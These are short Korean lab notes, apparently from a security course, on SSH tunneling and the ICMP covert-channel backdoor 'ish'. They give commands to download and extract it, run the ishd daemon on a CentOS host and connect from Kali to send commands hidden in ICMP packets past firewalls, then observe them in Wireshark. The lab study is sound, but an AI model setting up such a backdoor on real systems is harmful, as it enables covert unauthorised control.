터널링
ssh는 암호화가 되어있어서 무슨내용인지 볼수없다.
그래서 세션을 통해서만 인터넷 연결이 가능하다.
naver패킷을 캡쳐중인데도 터널링을 해서 패킷이 올라오지 않는다.
만약 세션을 닫으면 인터넷이 연결되지 않는다.
은닉채널
ish
ish(백도어)를 이용한 은닉통신 ish는 ishd(데몬)과 ish(클라이언트)프로그램을 이용한 은닉 채널 통신 프로그램이다. • ish는 icmp 메시지만을 이용한다. • 세션이 없음으로 방화벽을 우회할수 있다
wget 192.168.10.11/data/down/security/ish-v0.2.tar
tar xvfz ish-v0.2.tar.gz
다운 받아서 압축을 푼다.
서버쪽(centos)
./ishd
클라이언트(kali)
./ish 192.168.11.17
접속이 되면 클라이언트에서 명령어 입력해보면 icmp패킷안에 명령어들을 확인이 가능하다.
와이어샤크로 확인 가능